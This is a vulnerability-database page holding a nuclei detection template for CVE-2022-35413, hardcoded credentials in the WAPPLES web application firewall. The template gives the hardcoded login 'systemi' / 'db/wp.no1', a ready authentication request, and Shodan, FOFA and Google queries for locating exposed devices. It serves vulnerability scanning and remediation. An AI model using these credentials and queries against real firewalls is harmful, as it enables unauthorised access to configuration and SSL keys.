Lucene search
K

WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 76 Views

WAPPLES Web App Firewall <=6.0 Hardcoded Credentials, critical vulnerability, unauthorized acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-35413
13 Sep 202222:15
attackerkb
Circl
CVE-2022-35413
14 Sep 202202:25
circl
CNNVD
Penta Security Systems WAPPLES 信任管理问题漏洞
13 Sep 202200:00
cnnvd
CVE
CVE-2022-35413
13 Sep 202222:00
cve
Cvelist
CVE-2022-35413
13 Sep 202222:00
cvelist
NVD
CVE-2022-35413
13 Sep 202222:15
nvd
OSV
CVE-2022-35413
13 Sep 202222:15
osv
Prion
Hardcoded credentials
13 Sep 202222:15
prion
Positive Technologies
PT-2022-22814 · Wapples · Wapples
13 Sep 202200:00
ptsecurity
RedhatCVE
CVE-2022-35413
9 Jan 202610:39
redhatcve
Rows per page
id: CVE-2022-35413

info:
  name: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials
  author: For3stCo1d
  severity: critical
  description: |
    WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall.
  remediation: |
    Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability.
  reference:
    - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
    - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35413
    - https://www.pentasecurity.com/product/wapples/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-35413
    cwe-id: CWE-798
    epss-score: 0.12476
    epss-percentile: 0.95737
    cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: pentasecurity
    product: wapples
    shodan-query:
      - http.title:"Intelligent WAPPLES"
      - http.title:"intelligent wapples"
    fofa-query: title="intelligent wapples"
    google-query: intitle:"intelligent wapples"
  tags: cve,cve2022,wapples,firewall,default-login,pentasecurity,vkev,vuln

http:
  - raw:
      - |
        POST /webapi/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id={{username}}&password={{password}}

    payloads:
      username:
        - systemi
      password:
        - db/wp.no1
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"res_msg":"Authentication Success."'
          - '"doc_id":"user_systemi"'
        condition: and

      - type: word
        part: header
        words:
          - WP_SESSID=

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204b093f6c3bf8b6c46e50e09a07d74f0d6d3acbffd10cc87b774ded1b3bc324f2022100dff4a9e233d6798309c10a472c7eea4804857566362e10c86df854fac5d6d96b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.12476
76